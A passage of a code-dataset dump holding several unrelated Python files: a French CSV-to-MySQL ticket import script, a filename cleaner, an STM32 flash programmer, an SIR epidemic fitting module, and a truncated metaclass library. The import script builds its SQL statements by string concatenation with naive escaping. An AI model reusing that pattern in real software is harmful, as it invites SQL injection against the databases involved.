codecs\n\nimport MyLogger\nimport MyLib\n\n#Déclaration\narguments = dict() #dict\ni = 0 #Int\nconfig_json = {} #Json\nstatusSupervision = \"OK\"\n\n#Procedure chargement du fichier config JSON\ndef charger_config() :\n global config_json\n try:\n MyLogger.logger.debug(\"Début chargement configuration\")\n config=codecs.open(arguments[\"param\"], 'r','utf-8')\n config_json = json.load(config)\n MyLogger.logger.debug(\"Chargement configuration réussi\")\n except ValueError as exc:\n MyLogger.logger.error(\"Erreur pendant le chargement du fichier de configuration : \" + arguments[\"param\"])\n sys.exit(\"Erreur\")\n\n#importe un obj\ndef import_url(p_url, p_file_out, p_table) :\n try:\n #En prod oui\n #proxies = {'http': 'http://fr-proxy.groupinfra.com:3128'}\n #opener = urllib.request.FancyURLopener(proxies)\n opener = urllib.request.FancyURLopener({})\n response = opener.open(p_url)\n page = response.read().decode('utf-8')\n\n fo = open(config_json[\"parameters\"][\"path\"]+p_file_out, \"wb\")\n fo.write(page.encode('utf-8'))\n fo.close()\n\n MyLogger.logger.debug(\"Création du fichier : \"+p_file_out+\", réussi\")\n\n cnx = mysql.connector.connect(user=config_json[\"config_db_integration\"][\"db\"], database=config_json[\"config_db_integration\"][\"db\"], password=config_json[\"config_db_integration\"][\"mdp\"], host=config_json[\"config_db_integration\"][\"host\"])\n cur = cnx.cursor(buffered=True)\n\n with open(config_json[\"parameters\"][\"path\"]+p_file_out, encoding='utf-8') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n headers = reader.__next__()\n\n sql = \"DROP TABLE `rec_\"+p_table+\"`\"\n 
try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour is not None):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n sql = \"CREATE TABLE `rec_\"+p_table+\"` (`id` int(11) NOT NULL AUTO_INCREMENT,\"\n\n for header in headers:\n sql += \"`\"+header.replace(\"'\", \"\\\\'\")+\"` varchar(255),\"\n \n sql += \"`dateTime_record` datetime, PRIMARY KEY (`id`));\"\n\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n\n retour = cur.fetchone()\n if(retour is not None):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n nb_ligne_succes = 0\n nb_ligne_warning = 0\n nb_ligne_erreur = 0\n \n for rows in reader:\n sql = \"INSERT INTO `rec_\"+p_table+\"` (\"\n for header in headers:\n sql += \"`\"+header.replace(\"'\", \"\\\\'\")+\"`,\"\n sql += \"`id`, `dateTime_record`) VALUES (\"\n for row in rows:\n sql += \"'\"+row.replace(\"'\", \"\\\\'\")+\"',\"\n sql += \"NULL,NOW());\"\n\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n nb_ligne_erreur += 1\n\n retour = cur.fetchone()\n if(retour is not None):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n nb_ligne_warning += 1\n else :\n nb_ligne_succes += 1\n\n cnx.commit()\n\n cnx.close()\n \n MyLogger.logger.debug(\"Importation réussi (\"+str(nb_ligne_succes)+\" lignes succées, \"+str(nb_ligne_warning)+\" lignes warning, \"+str(nb_ligne_erreur)+\", lignes erreur)\")\n\n os.rename(config_json[\"parameters\"][\"path\"]+p_file_out, config_json[\"parameters\"][\"path\"]+\"Archives/\"+p_file_out)\n \n #supervision\n if nb_ligne_succes == 0 :\n statusSupervision = \"WARNING\"\n \n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:Importation][fichier:\"+p_file_out+\"][nb_ligne_succes:\"+str(nb_ligne_succes)+\"][nb_ligne_warning:\"+str(nb_ligne_warning)+\"][nb_ligne_erreur:\"+str(nb_ligne_erreur)+\"]Synchro Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n \n except Exception as e:\n MyLogger.logger.error(\"Erreur pendant import_url : (\"+format(e)+\")\")\n sys.exit(\"Erreur\")\n\n#Procedure Mise à jour\ndef importer() :\n global config_json\n try:\n MyLogger.logger.debug(\"Début importation\")\n\n #supervision\n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:start]Synchro 
Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n\n now = datetime.datetime.now()\n dateTime = now.strftime(\"%y%m%d_%H%M\")\n datTimSemDerniere = datetime.datetime.now()-timedelta(days=7)\n strSemDerniere = datTimSemDerniere.strftime(\"%Y-%m-%d\")\n\n for objs in config_json[\"config_brise\"]:\n url = config_json[\"config_brise\"][objs]\n name_file_out = \"data_\"+objs+\"_\"+dateTime+\".csv\"\n MyLogger.logger.debug(\"Objet à importer : \"+objs)\n MyLogger.logger.debug(\"Url de l'objet : \"+url)\n MyLogger.logger.debug(\"Fichier de sortie : \"+name_file_out)\n\n import_url(url, name_file_out, objs)\n\n cnx = mysql.connector.connect(user=config_json[\"config_db_integration\"][\"db\"], database=config_json[\"config_db_integration\"][\"db\"], password=config_json[\"config_db_integration\"][\"mdp\"], host=config_json[\"config_db_integration\"][\"host\"])\n cur = cnx.cursor(buffered=True)\n\n MyLogger.logger.debug(\"Chargement des données\")\n \n sql = \"SELECT charger_data_oceane('');\"\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n MyLogger.logger.debug(\"Chargement des données réussi\")\n\n #Merge des tickets debut\n MyLogger.logger.debug(\"Merge des tickets\")\n \n sql = \"select merge_tickets('');\"\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n cnx.commit() \n\n MyLogger.logger.debug(\"Merge des tickets réussi\")\n #Merge des tickets fin\n\n #synchro oceane debut\n MyLogger.logger.debug(\"Synchronisation Oceane\")\n \n sql = \"select synchro_oceane('\"+strSemDerniere+\"');\"\n MyLogger.logger.debug(\"Lancement du SQL : \"+ sql)\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n sql = \"select synchro_oceane_sta_vr('\"+strSemDerniere+\"');\"\n MyLogger.logger.debug(\"Lancement du SQL : \"+ sql)\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n cnx.commit() \n\n MyLogger.logger.debug(\"Synchronisation Oceane réussi\")\n #synchro oceane fin\n \n cnx.close()\n\n #supervision\n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:fin][Statut:\"+statusSupervision+\"]Synchro Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n 
cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n \n except Exception as e:\n MyLogger.logger.error(\"Erreur pendant importer : (\"+format(e)+\")\")\n #supervision\n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:fin][Statut:KO]Synchro Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n sys.exit(\"Erreur\")\n\n#Procedure Say More\ndef more() :\n MyLogger.logger.info(\"Les options disponible sont : 'importer'.\")\n MyLogger.logger.info(\"Exemple de syntax pour 'decode' : 'python script_import_oceane.py exemple.config.api.oda_noa.json importer'.\")\n MyLogger.logger.info(\"Exemple de syntax pour 'more' : 'python script_import_oceane.py more'.\")\n \n\n#Message de bienvenu.\nMyLogger.logger.info (\"Bienvenue dans le script d'importation des tickets Océnane.\")\n\n#Récupération des arguments.\nfor x in sys.argv :\n i += 1\n if i == 2 :\n arguments[\"param\"] = x\n elif i == 3 :\n arguments[\"action\"] = x\n if x not in [\"importer\"] :\n MyLogger.logger.warning(\"Votre premier argument (\"+x+\") est incorrect, seul 'importer' sont aurorisés.\")\n sys.exit(\"Erreur\")\n else :\n MyLogger.logger.info(\"Mode d'action choisi : \"+x+\".\")\n arguments[\"action\"] = x\n \n if len(arguments) == 0 :\n arguments[\"action\"] = \"more\"\n\n#Affichage \nif arguments[\"action\"] == \"importer\" :\n charger_config()\n importer()\nelif arguments[\"action\"] == \"more\" :\n more()\n\n#Message de fin.\nMyLogger.logger.info (\"Fin du script.\")\nsys.exit(0)\n\n \n","repo_name":"Happykiller/ODA_NOA","sub_path":"Scripts_python/import_oceane/script_import_oceane.py","file_name":"script_import_oceane.py","file_ext":"py","file_size_in_byte":12555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25358759934","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 12:11:47 2019\n\n@author: antonio\n\"\"\"\n\nimport os\n############# Make a copy of entire directory so we do not lose the originals ################# \n\n\ndef format_filenames(datapath, copy=False):\n \n if copy == True:\n ############# Make a copy of entire directory so we do not lose the originals #################\n \n # First, remove spaces (DONE through command line)\n \n # Then, remove weird characters\n for root, dirs, files in os.walk(datapath):\n for filename in files:\n if filename[-3:] == 'pdf': # get only txt files\n \n # Remove internal dots\n filename_no_dots = filename.replace('.', '')\n filename_list = list(filename_no_dots)\n filename_list[-3:] = list('.pdf')\n filename_one_dot = \"\".join(filename_list)\n \n # Remove internal commas and accents\n old_symbols = [',', 'á', 'é', 'í', 'ó', 'ú']\n new_symbols = ['', 'a', 'e', 'i', 'o', 'u']\n filename_new_symbols = filename_one_dot\n for old, new in zip(old_symbols, new_symbols):\n filename_new_symbols = 
filename_new_symbols.replace(old, new)  # apply each substitution; replacing ',' every pass ignored the zipped pairs\n                    \n                    # Rename file\n                    os.rename(os.path.join(root,filename), os.path.join(root, filename_new_symbols))\n                    \n    else:\n        print('Make a copy of entire directory so we do not lose the originals, then change copy parameter to True') \nif __name__ == '__main__':\n    ############# Make a copy of entire directory so we do not lose the originals ################# \n\n    datapath = '/home/antonio/Downloads/ecimed_splitted'\n    format_filenames(datapath, copy=False)","repo_name":"tonifuc3m/utils_BSC","sub_path":"format_filenames.py","file_name":"format_filenames.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"42606206197","text":"import time\n\nFLASH_KR = 0x40022004\nFLASH_SR = 0x4002200C\nFLASH_CR = 0x40022010\nFLASH_AR = 0x40022014\n\nFLASH_KR_KEY1 = 0X45670123\nFLASH_KR_KEY2 = 0XCDEF89AB\n\nFLASH_SR_BUSY = (1 << 0)\n\nFLASH_CR_PWRITE = (1 << 0) #Page Write\nFLASH_CR_SERASE = (1 << 1) #Sect Erase\nFLASH_CR_CERASE = (1 << 2) #Chip Erase\nFLASH_CR_ESTART = (1 << 6) #Erase Start\nFLASH_CR_LOCK = (1 << 7)\n\nclass STM32F103C8(object):\n    CHIP_CORE = 'Cortex-M3'\n\n    PAGE_SIZE = 1024 * 1\n    SECT_SIZE = 1024 * 1\n    CHIP_SIZE = 1024 * 64\n\n    def __init__(self, xlink):\n        super(STM32F103C8, self).__init__()\n        \n        self.xlink = xlink\n\n    def unlock(self):\n        self.xlink.write_U32(FLASH_KR, FLASH_KR_KEY1)\n        self.xlink.write_U32(FLASH_KR, FLASH_KR_KEY2)\n\n    def lock(self):\n        self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_LOCK)\n\n    def wait_ready(self):\n        while self.xlink.read_U32(FLASH_SR) & FLASH_SR_BUSY:\n            time.sleep(0.001)\n    \n    def sect_erase(self, addr, size):\n        self.unlock()\n        self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_SERASE)\n        for i in range(0, (size + self.SECT_SIZE - 1) // self.SECT_SIZE):\n            self.xlink.write_U32(FLASH_AR, 0x08000000 + addr + self.SECT_SIZE * i)\n            self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_ESTART)\n            self.wait_ready()\n        self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) &~FLASH_CR_SERASE)\n        self.lock()\n\n    def page_write(self, addr, data):\n        self.unlock()\n        self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_PWRITE)\n        for i in range(self.PAGE_SIZE//2):\n            self.xlink.write_U16(addr + i*2, data[i*2] | (data[i*2+1] << 8))\n        self.wait_ready()\n        self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) &~FLASH_CR_PWRITE)\n        self.lock()\n    \n    def chip_write(self, addr, data):\n        self.sect_erase(addr, len(data))\n\n        for i in range(0, len(data)//self.PAGE_SIZE):\n            self.page_write(0x08000000 + addr + self.PAGE_SIZE * i, data[self.PAGE_SIZE*i : self.PAGE_SIZE*(i+1)])\n\n    def chip_read(self, addr, size, buff):\n        c_char_Array = self.xlink.read_mem(addr, size)\n\n        buff.extend(list(bytes(c_char_Array)))\n\n\nclass STM32F103RC(STM32F103C8):\n    PAGE_SIZE = 1024 * 2\n    SECT_SIZE = 1024 * 2\n    CHIP_SIZE = 1024 * 256\n","repo_name":"XIVN1987/MCUProg","sub_path":"device/STM32F103_LS.py","file_name":"STM32F103_LS.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"37"}
{"seq_id":"26630801914","text":"from collections import defaultdict\nfrom sklearn.model_selection import ParameterSampler\nimport joblib\nimport numpy as np\nfrom pathlib import Path\nfrom iminuit import Minuit\nimport multiprocessing as mp\nfrom tqdm import tqdm\nfrom scipy.stats import uniform as sp_uniform\nfrom copy import copy, deepcopy\nfrom importlib import reload\nimport warnings\nfrom p_tqdm import p_umap\nfrom functools import partial\n\ntry:\n    from src.utils import utils\n    from src import file_loaders\n    from src import SIR\nexcept ImportError:\n    import utils\n    import file_loaders\n    import SIR\n\n# reload(SIR)\n\n\ndef uniform(a, b):\n    loc = a\n    scale = b - a\n    return sp_uniform(loc, scale)\n\n\ndef extract_data(t, y, T_max, N_tot, y_max=0.01):\n    \"\"\"Extract data where:\n    1) y is larger than 1‰ (permille) of N_tot\n    2) y is smaller than y_max of N_tot (default 1%)\n    3) t is less than T_max\"\"\"\n    mask_min_1_permille = y > N_tot * 1 / 1000\n    mask_max_1_percent = y < N_tot * y_max\n    mask_T_max = t < T_max\n    mask = mask_min_1_permille & mask_max_1_percent & mask_T_max\n    return t[mask], y[mask]\n\n\ndef add_fit_results_to_fit_object(fit_object, filename, cfg, T_max, df, make_MC_fits=False):\n\n    fit_object.filename = filename\n\n    I_max_SIR, R_inf_SIR = SIR.calc_deterministic_results(cfg, T_max * 1.2, dt=0.01, ts=0.1)\n    I_max_fit, R_inf_fit = fit_object.compute_I_max_R_inf(T_max=T_max * 1.5)\n\n    fit_object.I_max_ABM = np.max(df[\"I\"])\n    fit_object.I_max_fit = I_max_fit\n    fit_object.I_max_SIR = I_max_SIR\n\n    fit_object.R_inf_ABM = df[\"R\"].iloc[-1]\n    fit_object.R_inf_fit = R_inf_fit\n    fit_object.R_inf_SIR = R_inf_SIR\n\n    if make_MC_fits:\n        SIR_results, I_max_MC, R_inf_MC = fit_object.make_monte_carlo_fits(\n            N_samples=100, T_max=T_max * 1.5, ts=0.1\n        )\n        # fit_object.SIR_results = SIR_results\n        fit_object.I_max_MC = I_max_MC\n        fit_object.R_inf_MC = R_inf_MC\n\n\ndef draw_random_p0(cfg, N_max_fits):\n    param_grid = {\n        # 'lambda_E': uniform(cfg.lambda_E/10, cfg.lambda_E*5),\n        # 'lambda_I': uniform(cfg.lambda_I/10, cfg.lambda_I*5),\n        \"beta\": uniform(cfg.beta / 10, cfg.beta * 5),\n        \"tau\": uniform(-10, 10),\n    }\n    i = 0\n    while i < N_max_fits:\n        random_p0 = list(ParameterSampler(param_grid, n_iter=1))[0]\n        yield i, random_p0\n        i += 1\n\n\ndef refit_if_needed(fit_object, cfg, bounds, fix, minuit, N_max_fits=10, debug=False):\n\n    fit_failed = True\n    i_refits = 0\n\n    if fit_object.valid_fit:\n        fit_failed = False\n\n    else:\n\n        minuit_dict = dict(\n            pedantic=False,\n            print_level=0,\n            **bounds,\n            errordef=Minuit.LEAST_SQUARES,\n            **fix,\n        )\n\n        # max_reduced_chi2 = np.linspace(3, 3, N_max_fits)\n\n        best_fit_red_chi2 = 1e10\n        best_fit = None\n\n        for i_refits, random_p0 in draw_random_p0(cfg, N_max_fits):\n\n            minuit = Minuit(fit_object, **random_p0, **minuit_dict)\n            minuit.migrad()\n            # fit_object.set_minuit(minuit, max_reduced_chi2[i_refits])\n            fit_object.set_minuit(minuit, max_reduced_chi2=100)\n\n            better_chi2 = fit_object.reduced_chi2 < best_fit_red_chi2\n            semi_valid = fit_object._valid_fit(minuit, max_reduced_chi2=None)\n            if better_chi2 and semi_valid:\n                best_fit = copy(fit_object)\n                best_fit_red_chi2 = fit_object.reduced_chi2\n\n            if debug:\n                print(i_refits, fit_object.reduced_chi2)\n\n            if fit_object.valid_fit:\n                fit_failed = False\n                fit_object = best_fit\n                break\n\n    # if unable to fit the data, stop the fit\n    if fit_failed:\n        return fit_object, fit_failed\n\n    # compute better errors (slow!)\n    # minuit.minos()\n    # fit_object.set_minuit(minuit)\n\n    fit_object.N_refits = i_refits\n    return fit_object, fit_failed\n\n\ndef run_actual_fit(t, y, sy, cfg, dt, ts):\n\n    debug = False\n    # debug = True\n\n    # np.random.seed(cfg.ID)\n    np.random.seed(42)\n\n    if debug:\n        reload(SIR)\n        print(\"delete this\")\n\n    # reload(SIR)\n    normal_priors = dict(\n        # multiplier=0,\n        # lambda_E={'mean': cfg.lambda_E, 'std': 
cfg.lambda_E/10},\n # lambda_I={'mean': cfg.lambda_I, 'std': cfg.lambda_I/10},\n # beta= {'mean': 0.01, 'std': 0.05},\n )\n\n p0 = dict(\n lambda_E=cfg.lambda_E,\n lambda_I=cfg.lambda_I,\n beta=cfg.beta,\n tau=0,\n )\n\n bounds = dict(\n limit_lambda_E=(1e-6, None),\n limit_lambda_I=(1e-6, None),\n limit_beta=(1e-6, None),\n )\n\n fix = dict(\n fix_lambda_E=True,\n fix_lambda_I=True,\n )\n\n fit_object = SIR.FitSIR(t, y, sy, normal_priors, cfg, dt=dt, ts=ts)\n minuit = Minuit(\n fit_object,\n pedantic=False,\n print_level=0,\n **p0,\n **bounds,\n **fix,\n errordef=Minuit.LEAST_SQUARES,\n )\n\n minuit.migrad()\n\n fit_object.set_minuit(minuit)\n\n fit_object, fit_failed = refit_if_needed(fit_object, cfg, bounds, fix, minuit, debug=debug)\n\n return fit_object, fit_failed\n\n\ndef fit_single_file(filename, cfg, ts=0.1, dt=0.01, y_max=0.01):\n\n df = file_loaders.pandas_load_file(filename)\n\n df_interpolated = SIR.interpolate_df(df)\n\n # Time at end of simulation\n T_max = df[\"time\"].max()\n\n # time at peak I (peak infection)\n T_peak = df[\"time\"].iloc[df[\"I\"].argmax()]\n\n # extract data between 1 permille and 1 percent I of N_tot and lower than T_max\n t, y = extract_data(\n t=df_interpolated[\"time\"].values,\n y=df_interpolated[\"I\"].values,\n T_max=T_peak,\n N_tot=cfg.N_tot,\n y_max=y_max,\n )\n sy = np.sqrt(y)\n\n if len(t) < 5:\n return filename, f\"Too few datapoints (N = {len(t)})\"\n\n fit_object, fit_failed = run_actual_fit(t, y, sy, cfg, dt, ts)\n if fit_failed:\n return filename, \"Fit failed\"\n\n try:\n add_fit_results_to_fit_object(\n fit_object,\n filename,\n cfg,\n T_max,\n df,\n make_MC_fits=False,\n )\n except AttributeError as e:\n print(filename)\n print(\"\\n\\n\")\n raise e\n\n return filename, fit_object\n\n\n#%%\n\nfrom collections import Counter\n\n\ndef fit_multiple_files(cfg, filenames, num_cores=1, do_tqdm=True, y_max=0.01, verbose=False):\n\n func = partial(fit_single_file, cfg=cfg, y_max=y_max)\n\n if num_cores == 1:\n if do_tqdm:\n filenames = tqdm(filenames)\n results = [func(filename) for filename in filenames]\n\n else:\n results = p_umap(func, filenames, num_cpus=num_cores, disable=True)\n\n reject_counter = Counter()\n\n # postprocess results from multiprocessing:\n fit_objects = {}\n for filename, fit_result in results:\n\n if isinstance(fit_result, str):\n if verbose:\n print(f\"\\n\\n{filename} was rejected due to {fit_result.lower()}\")\n reject_counter[fit_result.lower()] += 1\n\n else:\n fit_object = fit_result\n fit_objects[filename] = fit_object\n reject_counter[\"no rejection\"] += 1\n\n return fit_objects, reject_counter\n\n\ndef get_fit_results(abm_files, force_rerun=False, num_cores=1, y_max=0.01):\n\n all_fits_file = f\"Data/fits_ymax_{y_max}.joblib\"\n\n if Path(all_fits_file).exists() and not force_rerun:\n print(\"Loading all Imax fits\", flush=True)\n return joblib.load(all_fits_file)\n\n else:\n\n all_fits = {}\n print(\n f\"Fitting {len(abm_files.all_filenames)} files with {len(abm_files.cfgs)} different simulation parameters, please wait.\",\n flush=True,\n )\n\n reject_counter = Counter()\n\n desc = \"Fitting ABM simulations\"\n for cfg, filenames in tqdm(abm_files.iter_folders(), total=len(abm_files.cfgs), desc=desc):\n # break\n output_filename = Path(\"Data/fits\") / f\"fits_{cfg.hash}_ymax_{y_max}.joblib\"\n utils.make_sure_folder_exist(output_filename)\n\n if output_filename.exists():\n all_fits[cfg.hash] = joblib.load(output_filename)\n\n else:\n with warnings.catch_warnings():\n warnings.filterwarnings(\n \"ignore\", 
message=\"covariance is not positive-semidefinite.\"\n )\n fit_results, reject_counter_tmp = fit_multiple_files(\n cfg,\n filenames,\n num_cores=num_cores,\n y_max=y_max,\n )\n\n joblib.dump(fit_results, output_filename)\n all_fits[cfg.hash] = fit_results\n reject_counter += reject_counter_tmp\n\n print(reject_counter)\n\n joblib.dump(all_fits, all_fits_file)\n return all_fits\n\n\nif False:\n\n import matplotlib.pyplot as plt\n from matplotlib.ticker import EngFormatter\n\n filename = \"Data/ABM/e24e6303fc/ABM_2020-10-12_e24e6303fc_ID__0.hdf5\"\n cfg = file_loaders.filename_to_cfg(filename)\n filename, fit_result = fit_single_file(filename, cfg, ts=0.1, dt=0.01, y_max=0.01)\n\n t = fit_result.t\n T_max = max(t) * 1.1\n df_fit = fit_result.calc_df_fit(ts=0.1, T_max=T_max)\n\n xlim = (63, 97)\n ylim = (0, 75_000)\n\n fig, ax = plt.subplots(figsize=(6, 6))\n ax.errorbar(t, fit_result.y, fit_result.sy, fmt=\".\", label=\"ABM\")\n ax.plot(df_fit[\"time\"], df_fit[\"I\"], label=\"Fit\")\n ax.set(xlim=xlim, title=\"Fit\", ylim=ylim)\n ax.text(\n 0.1,\n 0.8,\n f\"$\\chi^2 = {fit_result.chi2:.1f}, N = {fit_result.N}$\",\n transform=ax.transAxes,\n fontsize=24,\n )\n ax.yaxis.set_major_formatter(EngFormatter())\n\n\n#%%\n\nimport pandas as pd\n\nfrom iminuit import Minuit, describe\nfrom iminuit.util import make_func_code\nfrom IPython.display import display\n\n\ndef exponential(t, I_0, R_eff, T):\n return I_0 * R_eff ** (t / T)\n\n\nclass FitSingleInfection_R_eff:\n def __init__(self, I, x=None, verbose=True):\n\n self.I = I.copy()\n if x is not None:\n self.x = x.copy()\n else:\n self.x = np.arange(len(I))\n self.sy = np.sqrt(I)\n\n self.verbose = verbose\n\n self.model = exponential\n self.fit_kwargs = {\n \"I_0\": self.I[0],\n \"R_eff\": 1,\n \"limit_R_eff\": (0, None),\n \"T\": 4.7,\n \"fix_T\": True,\n }\n self.func_code = make_func_code(describe(self.model)[1:])\n self.N_fit_parameters = len(describe(self.model)[1:])\n self.N = len(I)\n self.df = self.N - self.N_fit_parameters\n\n def __call__(self, *par):\n yhat = self.model(self.x, *par)\n chi2 = np.sum((yhat - self.I) ** 2 / self.sy ** 2)\n return chi2\n\n def fit_single_week(self, verbose=None):\n if verbose is None:\n verbose = self.verbose\n m = Minuit(self, errordef=1, pedantic=False, **self.fit_kwargs)\n m.migrad()\n if not m.fmin.is_valid:\n print(\"Not valid fit\")\n if verbose:\n display(m.fmin)\n display(m.params)\n return dict(m.values), dict(m.errors)\n\n def fit_daily_R_eff(self, time_shift=0, keep_all_times=True):\n self.I_org = self.I.copy()\n self.x_org = self.x.copy()\n self.sy_org = self.sy.copy()\n R_eff = {}\n for day in range(7, self.N):\n days = np.arange(day - 7, day)\n self.I = self.I_org[days]\n self.x = self.x_org[days]\n self.sy = self.sy_org[days]\n values, errors = self.fit_single_week(verbose=False)\n\n if keep_all_times or day - time_shift >= 0:\n R_eff[day - time_shift] = {\n \"mean\": values[\"R_eff\"],\n \"std\": errors[\"R_eff\"],\n \"day_start\": days[0] - time_shift,\n \"day_end\": days[-1] - time_shift,\n }\n R_eff = pd.DataFrame(R_eff).T\n self.I = self.I_org\n self.x = self.x_org\n self.sy = self.sy_org\n del self.I_org\n del self.x_org\n del self.sy_org\n return R_eff.convert_dtypes().copy()\n","repo_name":"ChristianMichelsen/NetworkSIR","sub_path":"src/fits.py","file_name":"fits.py","file_ext":"py","file_size_in_byte":12240,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"21090364842","text":"\nimport sys\n\nfrom bento.properties import 
_BaseProperty, ObjectProperty, ListProperty, LockedProperty\nfrom bento.core_exceptions import *\n\n\nclass _BentobjMetaclass(type):\n\n def __new__(cls, name, bases, dct):\n\n for base in bases:\n for key, value in base.__dict__.items():\n if isinstance(value,_BaseProperty):\n dct[key] = base.__dict__[key]\n # WARNING! potential bug!\n # delattr(base, key)\n\n prop = {}\n for key,value in dct.items():\n if isinstance(value, _BaseProperty):\n prop[key] = (value.__class__, value._property_index)\n\n consecutive_arguments = [(key,value[1]) for key,value in prop.items()]\n consecutive_arguments.sort(key=lambda a : a[1])\n consecutive_arguments = [arg for arg,i in consecutive_arguments]\n\n dct.update({'_core_properties': prop,\n '_consecutive_arguments': consecutive_arguments,\n })\n \n return super(_BentobjMetaclass, cls).__new__(cls, name, bases, dct)\n\n\n# Create the base class according to python version\n# Base class definition for Python 3 is not in the same \n# file because it raises an syntax error when running\n# in a Python 2 environment.\nif sys.version_info.major == 3:\n from bento._p3k_metaclass import get_p3k_metaclass\n _Bentobjct = get_p3k_metaclass(_BentobjMetaclass)\n\nelse:\n class _Bentobjct(object):\n __metaclass__ = _BentobjMetaclass\n\n\nclass Bento(_Bentobjct):\n\n def __init__(self, *args, **kwargs):\n \n self._cached_properties = {} #cache for define_ functions\n self._strongly_cached_properties = set() # define_functions which will never be removed from cache\n self._set_consecutive_arguments(args)\n\n for prop_name in self._consecutive_arguments[len(args):]:\n prop = self.__class__.__getattribute__(self.__class__,prop_name)\n if 